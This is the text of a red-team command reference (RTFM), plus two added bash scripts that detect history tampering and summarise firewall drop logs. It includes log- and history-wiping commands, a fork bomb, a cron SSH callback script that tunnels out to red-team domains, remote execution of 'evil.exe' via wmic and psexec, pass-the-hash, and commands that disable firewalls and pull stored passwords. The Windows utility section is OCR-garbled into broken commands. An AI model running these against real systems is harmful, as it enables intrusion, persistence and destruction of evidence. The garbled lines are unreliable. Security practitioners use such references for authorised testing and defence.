RTFM. Copyright © 2013 by Ben Clark
All rights reserved. No part of this work may be reproduced or transmitted
in any form or by any means, without prior written permission of the
copyright owner.
ISBN-10: 1494295504
ISBN-13: 978-1494295509
Technical Editor: Joe Vest
Graphic: Joe Vest
Product and company names mentioned herein may be the trademarks of their
respective owners. Rather than use a trademark symbol with every occurrence
of a trademarked name, the author uses the names only in an editorial
fashion, with no intention of infringement of the trademark. Use of a term
in this book should not be regarded as affecting the validity of any
trademark or service mark.
The information in this book is distributed "as is". While every precaution
was taken to ensure the accuracy of the material, the author assumes no
responsibility or liability for errors or omissions, or for damages
resulting from the use of the information contained herein.
TABLE OF CONTENTS
*NIX ............... 4
WINDOWS ............ 14
NETWORKING ......... 34
TIPS AND TRICKS .... 42
TOOL SYNTAX ........ 50
WEB ................ 66
DATABASES .......... 72
PROGRAMMING ........ 76
WIRELESS ........... 84
REFERENCES ......... 94
INDEX .............. 95
THS Bonus Material added by 0E800
Nmap Cheat Sheet
Nmap Cheat Sheet 2
Wireshark Display Filters
Common Ports List
Google Cheat Sheet
Scapy
TCPDUMP
NAT
QoS
IPv4
IPv6
LINUX NETWORK COMMANDS
watch ss -tp                                    Network connections
netstat -ant                                    TCP connections (-anu=udp)
netstat -tulpn                                  Connections with PIDs
lsof -i                                         Established connections
smb://ip/share                                  Access Windows SMB share
share user x.x.x.x c$                           Mount Windows share
smbclient -U user \\\\ip\\share                 SMB connect
ifconfig eth# ip/cidr                           Set IP and netmask
ifconfig eth0:1 ip/cidr                         Set virtual interface
route add default gw gwip                       Set GW
ifconfig eth# mtu [size]                        Change MTU size
export MAC=xx:XX:XX:XX:XX:XX                    Change MAC
ifconfig int hw ether MAC                       Change MAC
macchanger -m MAC int                           Backtrack MAC changer
iwlist int scan                                 Built-in wifi scanner
dig -x ip                                       Domain lookup for IP
host ip                                         Domain lookup for IP
host -t SRV _service_tcp.url.com                Domain SRV lookup
dig @ip domain -t AXFR                          DNS Zone Xfer
host -l domain namesvr                          DNS Zone Xfer
ip xfrm state list                              Print existing VPN keys
ip addr add ip/cidr dev eth0                    Adds 'hidden' interface
/var/log/messages | grep DHCP                   List DHCP assignments
tcpkill host ip and port port                   Block ip:port
echo "1" > /proc/sys/net/ipv4/ip_forward        Turn on IP Forwarding
echo "nameserver x.x.x.x" >> /etc/resolv.conf   Add DNS Server
LINUX SYSTEM INFO
id                                  Current username
w                                   Logged on users
who -a                              User information
last -a                             Last users logged on
ps -ef                              Process listing (top)
df -h                               Disk usage (free)
uname -a                            Kernel version/CPU info
mount                               Mounted file systems
getent passwd                       Show list of users
PATH=$PATH:/home/mypath             Add to PATH variable
kill pid                            Kills process with pid
cat /etc/issue                      Show OS info
cat /etc/*release*                  Show OS version info
cat /proc/version                   Show kernel info
rpm --query -all                    Installed pkgs (Redhat)
rpm -ivh *.rpm                      Install RPM (-e=remove)
dpkg --get-selections               Installed pkgs (Ubuntu)
dpkg -I *.deb                       Install DEB (-r=remove)
pkginfo                             Installed pkgs (Solaris)
which tcsh/csh/ksh/bash             Show location of executable
chmod -so tcsh/csh/ksh              Disable shell, force bash
LINUX UTILITY COMMANDS
wget http://url -O url.txt -o /dev/null      Grab url
rdesktop ip                                  Remote Desktop to ip
scp /tmp/file user@x.x.x.x:/tmp/file         Put file
scp user@remoteip:/tmp/file /tmp/file        Get file
useradd -m user                              Add user
passwd user                                  Change user password
rmuser uname                                 Remove user
script -a outfile                            Record shell: Ctrl-D stops
apropos subject                              Find related command
history                                      View users command history
!num                                         Executes line # in history
LINUX FILE COMMANDS
diff file1 file2                                                Compare files
rm -rf dir                                                      Force delete of dir
shred -f -u file                                                Overwrite/delete file
touch -r ref_file file                                          Matches ref_file timestamp
touch -t YYYYMMDDHHSS file                                      Set file timestamp
sudo fdisk -l                                                   List connected drives
mount /dev/sda# /mnt/usbkey                                     Mount USB key
md5sum -t file                                                  Compute md5 hash
echo -n "str" | md5sum                                          Generate md5 hash
sha1sum file                                                    SHA1 hash of file
sort -u                                                         Sort/show unique lines
grep -c "str" file                                              Count lines w/ "str"
tar cf file.tar files                                           Create .tar from files
tar xf file.tar                                                 Extract .tar
tar czf file.tar.gz files                                       Create .tar.gz
tar xzf file.tar.gz                                             Extract .tar.gz
tar cjf file.tar.bz2 files                                      Create .tar.bz2
tar xjf file.tar.bz2                                            Extract .tar.bz2
gzip file                                                       Compress/rename file
gzip -d file.gz                                                 Decompress file.gz
upx -9 -o out.exe orig.exe                                      UPX packs orig.exe
zip -r zipname.zip \Directory\*                                 Create zip
dd skip=1000 count=2000 bs=8 if=file of=file                    Cut block 1K-3K from file
split -b 9K \file prefix                                        Split file into 9K chunks
awk 'sub("$","\r")' unix.txt > win.txt                          Win compatible txt file
find -i -name file -type *.pdf                                  Find PDF files
find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \;           Search for setuid files
dos2unix file                                                   Convert to *nix format
file file                                                       Determine file type/info
chattr (+/-)i file                                              Set/Unset immutable bit
LINUX MISC COMMANDS
unset HISTFILE                                          Disable history logging
ssh user@ip arecord - | aplay -                         Record remote mic
gcc -o outfile myfile.c                                 Compile C,C++
init 6                                                  Reboot (0 = shutdown)
cat /etc/*syslog*.conf | grep -v "^#"                   List of log files
grep 'href=' file | cut -d"/" -f3 | grep url | sort -u  Strip links in url.com
dd if=/dev/urandom of=file bs=3145728 count=100         Make random 3MB file
LINUX "COVER YOUR TRACKS" COMMANDS
echo "" > /var/log/auth.log                 Clear auth.log file
echo "" > ~/.bash_history                   Clear current user bash history
rm ~/.bash_history -rf                      Delete .bash_history file
history -c                                  Clear current session history
export HISTFILESIZE=0                       Set history max lines to 0
export HISTSIZE=0                           Set history max commands to 0
unset HISTFILE                              Disable history logging (need to logout to take effect)
kill -9 $$                                  Kills current session
ln /dev/null ~/.bash_history -sf            Permanently send all bash history commands to /dev/null
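The commands above each leave a recognizable trace on the host. As an added example (not from RTFM), the bash script below audits a home directory for those traces: a .bash_history that is a symlink to /dev/null, a missing or truncated history file, and HISTFILE/HISTSIZE/HISTFILESIZE being disabled in a shell rc file. The sample home directories are constructed in a temp dir, and every function name is this example's own.

```shell
#!/bin/bash
# Added example, not from RTFM: detect bash-history tampering indicators in a
# home directory. Each indicator is printed on its own line prefixed "FINDING:".
audit_history_tampering() {
  local home="$1"
  local hist="$home/.bash_history"

  # "ln -sf /dev/null ~/.bash_history" leaves a symlink, "rm" leaves nothing,
  # and "echo '' > ~/.bash_history" leaves a one-byte file.
  if [ -L "$hist" ] && [ "$(readlink "$hist")" = "/dev/null" ]; then
    echo "FINDING: $hist is a symlink to /dev/null"
  elif [ ! -e "$hist" ]; then
    echo "FINDING: $hist is missing"
  elif [ "$(wc -c < "$hist" | tr -d ' ')" -le 1 ]; then
    echo "FINDING: $hist is empty"
  fi

  # "unset HISTFILE", "HISTSIZE=0" or "HISTFILESIZE=0" persisted in an rc file
  local rc
  for rc in "$home/.bashrc" "$home/.bash_profile" "$home/.profile"; do
    [ -f "$rc" ] || continue
    if grep -Eq '^[[:space:]]*(unset[[:space:]]+HISTFILE|(export[[:space:]]+)?HIST(FILE)?SIZE=0)' "$rc"; then
      echo "FINDING: $rc disables history logging"
    fi
  done
}

# Number of findings for a home directory (prints "0" when clean).
count_findings() {
  audit_history_tampering "$1" | grep -c '^FINDING:' || true
}

# Constructed sample home showing two indicators (symlinked history, rc file).
make_tampered_home() {
  local d
  d="$(mktemp -d)"
  ln -sf /dev/null "$d/.bash_history"
  printf 'export HISTSIZE=0\nunset HISTFILE\n' > "$d/.bashrc"
  echo "$d"
}

# Constructed sample home with an ordinary history and rc file.
make_clean_home() {
  local d
  d="$(mktemp -d)"
  printf 'ls -la\ncd /var/log\n' > "$d/.bash_history"
  printf 'alias ll="ls -l"\n' > "$d/.bashrc"
  echo "$d"
}

TAMPERED="$(make_tampered_home)"
CLEAN="$(make_clean_home)"
audit_history_tampering "$TAMPERED"
echo "tampered findings: $(count_findings "$TAMPERED"), clean findings: $(count_findings "$CLEAN")"
rm -rf "$TAMPERED" "$CLEAN"
```

On a real host, run audit_history_tampering against each entry in /home plus /root; an empty or symlinked history on an account that is known to be used interactively is worth correlating with auth.log and wtmp (last -a), which the same commands are meant to clear.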
LINUX FILE SYSTEM STRUCTURE
/bin                                User binaries
/boot                               Boot-up related files
/dev                                Interface for system devices
/etc                                System configuration files
/home                               Base directory for user files
/lib                                Critical software libraries
/opt                                Third party software
/proc                               System and running programs
/root                               Home directory of root user
/sbin                               System administrator binaries
/tmp                                Temporary files
/usr                                Less critical files
/var                                Variable system files
LINUX FILES
/etc/shadow                         Local users' hashes
/etc/passwd                         Local users
/etc/group                          Local groups
/etc/rc.d                           Startup services
/etc/init.d                         Service
/etc/hosts                          Known hostnames and IPs
/etc/HOSTNAME                       Full hostname with domain
/etc/network/interfaces             Network configuration
/etc/profile                        System environment variables
/etc/apt/sources.list               Ubuntu sources list
/etc/resolv.conf                    Nameserver configuration
/home/user/.bash_history            Bash history (also /root/)
/usr/share/wireshark/manuf          Vendor-MAC lookup
~/.ssh/                             SSH keystore
/var/log                            System log files (most Linux)
/var/adm                            System log files (Unix)
/var/spool/cron                     List cron files
/var/log/apache/access.log          Apache connection log
/etc/fstab                          Static file system info
LINUX SCRIPTING
PING SWEEP
for x in {1..254..1};do ping -c 1 1.1.1.$x | grep "64 b" | cut -d" " -f4 >> ips.txt; done
AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1..254..1};do
host $range.$ip | grep "name pointer" | cut -d" " -f5
done
FORK BOMB (CREATES PROCESSES UNTIL SYSTEM "CRASHES")
:(){ :|: & };:
DNS REVERSE LOOKUP
for ip in {1..254..1}; do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done;
IP BANNING SCRIPT
#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while [ $i -le 253 ]
do
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i 00:00:00:00:00:0a
else
echo "IP NOT BANNED: 192.168.1.$i ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
echo "^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
fi
i=`expr $i + 1`
done
SSH CALLBACK
Set up script in crontab to callback every X minutes. Highly recommend you
set up a generic user on red team computer (with no shell privs). Script
will use the private key (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)
#!/bin/sh
# Callback script located on callback source computer (target)
killall ssh >/dev/null 2>&1
sleep 5
REMLIS=4040
REMUSR=user
HOSTS="domain1.com domain2.com domain3.com"
for LIVEHOST in $HOSTS;
do
COUNT=$(ping -c2 $LIVEHOST | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
if [ $COUNT -gt 0 ]; then
ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N ${LIVEHOST} -l ${REMUSR}
fi
done
IPTABLES
iptables-save -c > file                                 Dump iptables (with counters) rules to stdout
iptables-restore file                                   Restore iptables rules
iptables -L -v --line-numbers                           List all iptables rules with affected and line numbers
iptables -F                                             Flush all iptables rules
iptables -P INPUT/FORWARD/OUTPUT ACCEPT/REJECT/DROP     Change default policy for rules that don't match rules
iptables -A INPUT -i interface -m state --state RELATED,ESTABLISHED -j ACCEPT
                                                        Allow established connections on INPUT
iptables -D INPUT 7                                     Delete 7th inbound rule
iptables -t raw -L -n                                   Increase throughput by turning off statefulness
iptables -P INPUT DROP                                  Drop all packets
ALLOW SSH ON PORT 22 OUTBOUND
iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i iface -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
ALLOW ICMP OUTBOUND
iptables -A OUTPUT -o iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -i iface -p icmp --icmp-type echo-reply -j ACCEPT
PORT FORWARD
echo "1" > /proc/sys/net/ipv4/ip_forward
-OR- sysctl net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp -i eth0 -j DNAT -d pivotip --dport 443 --to-destination attackip:443
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT -s targetsubnetcidr -d attackip --dport 443 --to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT
ALLOW ONLY 1.1.1.0/24, PORTS 80,443 AND LOG DROPS TO /VAR/LOG/MESSAGES
iptables -A INPUT -s 1.1.1.0/24 -m state --state RELATED,ESTABLISHED,NEW -p tcp -m multiport --dports 80,443 -j ACCEPT
iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o eth0 -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP
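The LOGGING chain's --log-prefix "DROPPED " is what makes the resulting kernel log lines easy to triage. As an added example (not from RTFM), the bash functions below read /var/log/messages-style lines from stdin, summarize dropped packets per source, protocol and destination port, and flag sources that hit many distinct ports. SAMPLE_LOG is a constructed stand-in for the real log, and all function names are this example's own.

```shell
#!/bin/bash
# Added example, not from RTFM. Summarises packets dropped by the LOGGING chain
# above (iptables ... -j LOG --log-prefix "DROPPED "). SAMPLE_LOG is a
# constructed stand-in for /var/log/messages; function names are this example's own.
SAMPLE_LOG='Mar  1 10:00:01 host kernel: [  100.1] DROPPED IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=10.0.0.5 DST=1.1.1.10 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=40001 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0
Mar  1 10:00:02 host kernel: [  101.2] DROPPED IN=eth0 OUT= SRC=10.0.0.5 DST=1.1.1.10 LEN=60 PROTO=TCP SPT=40002 DPT=23 SYN URGP=0
Mar  1 10:00:03 host kernel: [  102.3] DROPPED IN=eth0 OUT= SRC=10.0.0.9 DST=1.1.1.10 LEN=84 PROTO=ICMP TYPE=8 CODE=0 ID=1 SEQ=1
Mar  1 10:00:04 host kernel: [  103.4] DROPPED IN=eth0 OUT= SRC=10.0.0.5 DST=1.1.1.10 LEN=60 PROTO=TCP SPT=40003 DPT=3389 SYN URGP=0
Mar  1 10:00:05 host sshd[123]: Accepted publickey for user from 1.1.1.20 port 50000 ssh2'

# Reads log lines on stdin; prints "count SRC PROTO DPT" for each distinct
# tuple, most frequent first. Lines without the "DROPPED " prefix are ignored.
summarize_drops() {
  grep 'DROPPED ' | awk '{
    src = ""; proto = "-"; dpt = "-"
    for (i = 1; i <= NF; i++) {
      split($i, kv, "=")
      if (kv[1] == "SRC") src = kv[2]
      else if (kv[1] == "PROTO") proto = kv[2]
      else if (kv[1] == "DPT") dpt = kv[2]
    }
    if (src != "") count[src " " proto " " dpt]++
  } END { for (k in count) print count[k], k }' | sort -rn -k1,1 -k2
}

# Number of distinct source addresses that had packets dropped.
count_sources() {
  grep 'DROPPED ' | grep -o 'SRC=[^ ]*' | sort -u | wc -l | tr -d ' '
}

# Sources that hit more than $1 distinct destination ports: a crude indicator
# that one host is probing the firewall rather than simply misconfigured.
scanning_sources() {
  local threshold="$1"
  grep 'DROPPED ' | awk -v t="$threshold" '{
    src = ""; dpt = ""
    for (i = 1; i <= NF; i++) {
      split($i, kv, "=")
      if (kv[1] == "SRC") src = kv[2]
      else if (kv[1] == "DPT") dpt = kv[2]
    }
    if (src != "" && dpt != "") seen[src " " dpt] = 1
  } END {
    for (k in seen) { split(k, a, " "); ports[a[1]]++ }
    for (s in ports) if (ports[s] > t) print s
  }' | sort
}

printf '%s\n' "$SAMPLE_LOG" | summarize_drops
echo "distinct sources: $(printf '%s\n' "$SAMPLE_LOG" | count_sources)"
echo "probing sources (>2 ports): $(printf '%s\n' "$SAMPLE_LOG" | scanning_sources 2)"
```

Because the LOGGING chain is rate-limited to 4/min, the counts are a lower bound on what was actually dropped; the limit keeps a flood from filling the disk, so treat the summary as an indicator and confirm volume with the packet counters from iptables -L -v.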
UPDATE-RC.D
• Check/change startup services
service --status-all                  [+] Service starts at boot
                                      [-] Service does not start
service service start                 Start a service
service service stop                  Stop a service
service service status                Check status of a service
update-rc.d -f service remove         Remove a service start up cmd (-f if the /etc/init.d start up file exists)
update-rc.d service defaults          Add a start up service
CHKCONFIG
• Available in Linux distributions such as Red Hat Enterprise Linux (RHEL),
CentOS and Oracle Enterprise Linux (OEL)
chkconfig --list                      List existing services and run status
chkconfig service --list              Check single service status
chkconfig service on [--level 3]      Add service [optional to add level at which service runs]
chkconfig service off [--level 3]     Remove service
e.g. chkconfig iptables off
SCREEN
(C-a == Control-a)
screen -S name                      Start new screen with name
screen -ls                          List running screens
screen -r name                      Attach to screen name
screen -S name -X cmd               Send cmd to screen name
C-a ?                               List keybindings (help)
C-a d                               Detach
C-a D D                             Detach and logout
C-a c                               Create new window
C-a C-a                             Switch to last active window
C-a ' num|name                      Switch to window num|name
C-a "                               See windows list and change
C-a k                               Kill current window
C-a S                               Split display horizontally
C-a |                               Split display vertically
C-a tab                             Jump to next display
C-a X                               Remove current region
C-a Q                               Remove all regions but current
X11
CAPTURE REMOTE X11 WINDOWS AND CONVERT TO JPG
xwd -display ip:0 -root -out /tmp/test.xpm
xwud -in /tmp/test.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg
OPEN X11 STREAM VIEWING
xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP
TCPDUMP
CAPTURE PACKETS ON ETH0 IN ASCII AND HEX AND WRITE TO FILE
tcpdump -i eth0 -XX -w out.pcap
CAPTURE HTTP TRAFFIC TO 2.2.2.2
tcpdump -i eth0 port 80 dst 2.2.2.2
SHOW CONNECTIONS TO A SPECIFIC IP
tcpdump -i eth0 -tttt dst 192.168.1.22 and not net 192.168.1.0/24
PRINT ALL PING RESPONSES
tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply'
CAPTURE 50 DNS PACKETS AND PRINT TIMESTAMP
tcpdump -i eth0 -c 50 -tttt 'udp and port 53'
NATIVE KALI COMMANDS
WMIC EQUIVALENT
wmis -U DOMAIN\user%password //DC cmd.exe /c command
MOUNT SMB SHARE
# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs //ip/share /mnt/share -o user=user,pass=pass,sec=ntlmssp,domain=domain,rw
UPDATING KALI
apt-get update
apt-get upgrade
PFSENSE
pfSsh.php                                   pfSense Shell System
pfSsh.php playback enableallowallwan        Allow all inbound WAN connections (adds to visible rules in WAN rules)
pfSsh.php playback enablesshd               Enable ssh inbound/outbound
pfctl -sn                                   Show NAT rules
pfctl -sr                                   Show filter rules
pfctl -sa                                   Show all rules
viconfig                                    Edit config
rm /tmp/config.cache                        Remove cached (backup) config after editing the current running
/etc/rc.reload_all                          Reload entire config
SOLARIS
ifconfig -a                                 List of interfaces
netstat -in                                 List of interface
ifconfig -r                                 Route listing
ifconfig eth0 dhcp                          Start DHCP client
ifconfig eth0 plumb up ip netmask nmask     Set IP
route add default ip                        Set gateway
logins -p                                   List users w/out passwords
svcs -a                                     List all services w/ status
prstat -a                                   Process listing (top)
svcadm start ssh                            Start SSH service
inetadm -e telnet (-d for disable)          Enable telnet
prtconf | grep Memory                       Total physical memory
iostat -En                                  Hard disk size
showrev -c /usr/bin/bash                    Information on a binary
shutdown -i6 -g0 -y                         Restart system
dfmounts                                    List clients connected NFS
smc                                         Management GUI
snoop -d int -c pkt# -o results.pcap        Packet capture
/etc/vfstab                                 File system mount table
/var/adm/logging                            Login attempt log
/etc/default/*                              Default settings
/etc/system                                 Kernel modules & config
/var/adm/messages                           Syslog location
/etc/auto_*                                 Automounter config files
/etc/inet/ipnodes                           IPv4/IPv6 host file
WINDOWS VERSIONS
NT 3.1      Windows NT 3.1 (All)
NT 3.5      Windows NT 3.5 (All)
NT 3.51     Windows NT 3.51 (All)
NT 4.0      Windows NT 4.0 (All)
NT 5.0      Windows 2000 (All)
NT 5.1      Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2      Windows XP (64-bit, Pro 64-bit)
            Windows Server 2003 & R2 (Standard, Enterprise)
            Windows Home Server
NT 6.0      Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate)
            Windows Server 2008 (Foundation, Standard, Enterprise)
NT 6.1      Windows 7 (Starter, Home, Pro, Enterprise, Ultimate)
            Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2      Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM))
            Windows Phone 8
            Windows Server 2012 (Foundation, Essentials, Standard)
WINDOWS FILES
%SYSTEMROOT%                                           Typically C:\Windows
%SYSTEMROOT%\System32\drivers\etc\hosts                DNS entries
%SYSTEMROOT%\System32\drivers\etc\networks             Network settings
%SYSTEMROOT%\system32\config\SAM                       User & password hashes
%SYSTEMROOT%\repair\SAM                                Backup copy of SAM
%SYSTEMROOT%\System32\config\RegBack\SAM               Backup copy of SAM
%WINDIR%\system32\config\AppEvent.Evt                  Application Log
%WINDIR%\system32\config\SecEvent.Evt                  Security Log
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\         Startup Location
%USERPROFILE%\Start Menu\Programs\Startup\             Startup Location
%SYSTEMROOT%\Prefetch                                  Prefetch dir (EXE logs)
STARTUP DIRECTORIES
WINDOWS NT 6.1, 6.0
# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
WINDOWS NT 5.2, 5.1, 5.0
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
WINDOWS 9x
%SystemDrive%\WINDOWS\Start Menu\Programs\Startup
WINDOWS NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
WINDOWS SYSTEM INFO COMMANDS
ver                                                   Get OS version
sc query state=all                                    Show services
tasklist /svc                                         Show processes & services
tasklist /m                                           Show all processes & DLLs
tasklist /S ip /v                                     Remote process listing
taskkill /PID pid /F                                  Force process to terminate
systeminfo /S ip /U domain\user /P Pwd                Remote system info
reg query \\ip\RegDomain\Key /v Value                 Query remote registry, /s=all values
reg query HKLM /f password /t REG_SZ /s               Search registry for password
fsutil fsinfo drives                                  List drives *must be admin
dir /a /s /b c:\*.pdf*                                Search for all PDFs
dir /a /b c:\windows\kb*                              Search for patches
findstr /si password *.txt | *.xml | *.xls            Search files for password
tree /F /A c:\ > tree.txt                             Directory listing of C:
reg save HKLM\Security security.hive                  Save security hive to file
echo %USERNAME%                                       Current user
WINDOWS NET/DOMAIN COMMANDS
net view /domain                                      Hosts in current domain
net view /domain:[MYDOMAIN]                           Hosts in [MYDOMAIN]
net user /domain                                      All users in current domain
net user user pass /add                               Add user
net localgroup "Administrators" user /add             Add user to Administrators
net accounts /domain                                  Domain password policy
net localgroup "Administrators"                       List local Admins
net group /domain                                     List domain groups
net group "Domain Admins" /domain                     List users in Domain Admins
net group "Domain Controllers" /domain                List DCs for current domain
net share                                             Current SMB shares
net session | find / "\\"                             Active SMB sessions
net user user /ACTIVE:yes /domain                     Unlock domain user account
net user user "newpassword" /domain                   Change domain user password
net share share c:\share /GRANT:Everyone,FULL         Share folder
WINDOWS REMOTE COMMANDS
tasklist /S ip /v                                     Remote process listing
systeminfo /S ip /U domain\user /P Pwd                Remote systeminfo
net share \\ip                                        Shares of remote computer
net use \\ip                                          Remote filesystem (IPC$)
net use z: \\ip\share password /user:DOMAIN\user      Map drive, specified credentials
reg add \\ip\regkey\value                             Add registry key remotely
sc \\ip create service binpath=C:\Windows\System32\x.exe start= auto
                                                      Create a remote service (space after start=)
xcopy /s \\ip\dir C:\local                            Copy remote folder
shutdown /m \\ip /r /t 0 /f                           Remotely reboot machine
WINDOWS NETWORK COMMANDS
ipconfig /all                                                 IP configuration
ipconfig /displaydns                                          Local DNS cache
netstat -ana                                                  Open connections
netstat -anop tcp 1                                           Netstat loop
netstat -an | findstr LISTENING                               LISTENING ports
route print                                                   Routing table
arp -a                                                        Known MACs (ARP table)
nslookup, set type=any, ls -d domain > results.txt, exit      DNS Zone Xfer
nslookup -type=SRV _www._tcp.url.com                          Domain SRV lookup (_ldap, _kerberos, _sip)
tftp -I ip GET remotefile                                     TFTP file transfer
netsh wlan show profiles                                      Saved wireless profiles
netsh firewall set opmode disable                             Disable firewall (*Old)
netsh wlan export profile folder=. key=clear                  Export wifi plaintext pwd
netsh interface ip show interfaces                            List interface IDs/MTUs
netsh interface ip set address local static ip nmask gw ID    Set IP
netsh interface ip set dns local static ip                    Set DNS server
netsh interface ip set address local dhcp                     Set interface to use DHCP
WINDOWS UTILITY COMMANDS
type
del
file
path\' .• /a /s /q /f
find /I ''str'' filename
command I find /c /v
at HH:Ml1 file [args] (i.e. at 14:45 cmd
/c)
runas /user: user " file [args] 11
restart /r /t 0
tr -d '\15\32' win.txt unix.txt
makecab file
Wusa.exe /uninstall /kb: ###
cmd.exe "wevtutil qe Application /c:40
/f:text /rd:true"
lusrrngr.rnsc
services.msc
taskmgr.exe
secpool.rnsc
eventvwr.rnsc
1?
Display file contents
Forceably delete all files
in path
Find "str"
Line count of
Schedule file
cmd output
to run
Run file as user
Restart now
Removes CR & 'Z ('nix)
Native compression
Uninstall patch
CLI Event Viewer
Local user manager
Services control panel
Task manager
Security policy manager
Event viewer
MISC. COMMANDS
LOCK WORKSTATION
rundll32.dll user32.dll LockWorkstation
DISABLE WINDOWS FIREWALL
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
NATIVE WINDOWS PORT FORWARD (*MUST BE ADMIN)
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2
# Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1
RE-ENABLE COMMAND PROMPT
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
PSEXEC
EXECUTE FILE HOSTED ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS
psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe
RUN REMOTE COMMAND WITH SPECIFIED HASH
psexec /accepteula \\ip -u Domain\user -p LM:NTLM cmd.exe /c dir c:\Progra~1
RUN REMOTE COMMAND AS SYSTEM
psexec /accepteula \\ip -s cmd.exe
TERMINAL SERVICES (RDP)
START RDP
1. Create regfile.reg file with following line in it:
   [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
2. "fDenyTSConnections"=dword:00000000
3. reg import regfile.reg
4. net start "termservice"
5. sc config termservice start= auto
6. net start termservice
--OR--
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
TUNNEL RDP OUT PORT 443 (MAY NEED TO RESTART TERMINAL SERVICES)
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
DISABLE NETWORK LEVEL AUTHENTICATION / ADD FIREWALL EXCEPTION
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable
IMPORT A SCHEDULE TASK FROM AN "EXPORTED TASK" XML
schtasks.exe /create /tn MyTask /xml "C:\MyTask.xml" /f
WMIC
WMIC [ALIAS] [WHERE] [CLAUSE]
wmic [alias] get /?                                   List all attributes
wmic [alias] call /?                                  Callable methods
wmic process list full                                Process attributes
wmic startup                                          Starts wmic service
wmic ntdomain list                                    Domain and DC info
wmic qfe                                              List all patches
wmic process call create "process_name"               Execute process
wmic process where name="process" call terminate      Terminate process
wmic logicaldisk get description,name                 View logical shares
wmic cpu get DataWidth /format:list                   Display 32 | 64 bit
[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] == where (name="cmd.exe"), where (parentprocessid!=[pid]), etc.
[clause] == list [full|brief], get [attrib1, attrib2], call [method], delete
EXECUTE FILE HOSTED OVER SMB ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS
wmic /node:targetIP /user:domain\user /password:password process call create "\\smbIP\share\evil.exe"
UNINSTALL SOFTWARE
wmic product get name /value    # Get software names
wmic product where name="XXX" call uninstall /nointeractive
REMOTELY DETERMINE LOGGED IN USER
wmic /node:remotecomputer computersystem get username
REMOTE PROCESS LISTING EVERY SECOND
wmic /node:machinename process list brief /every:1
REMOTELY START RDP
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
LIST NUMBER OF TIMES USER HAS LOGGED ON
wmic netlogin where (name like "%adm%") get numberoflogons
SEARCH FOR SERVICES WITH UNQUOTED PATHS TO BINARY
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
VOLUME SHADOW COPY
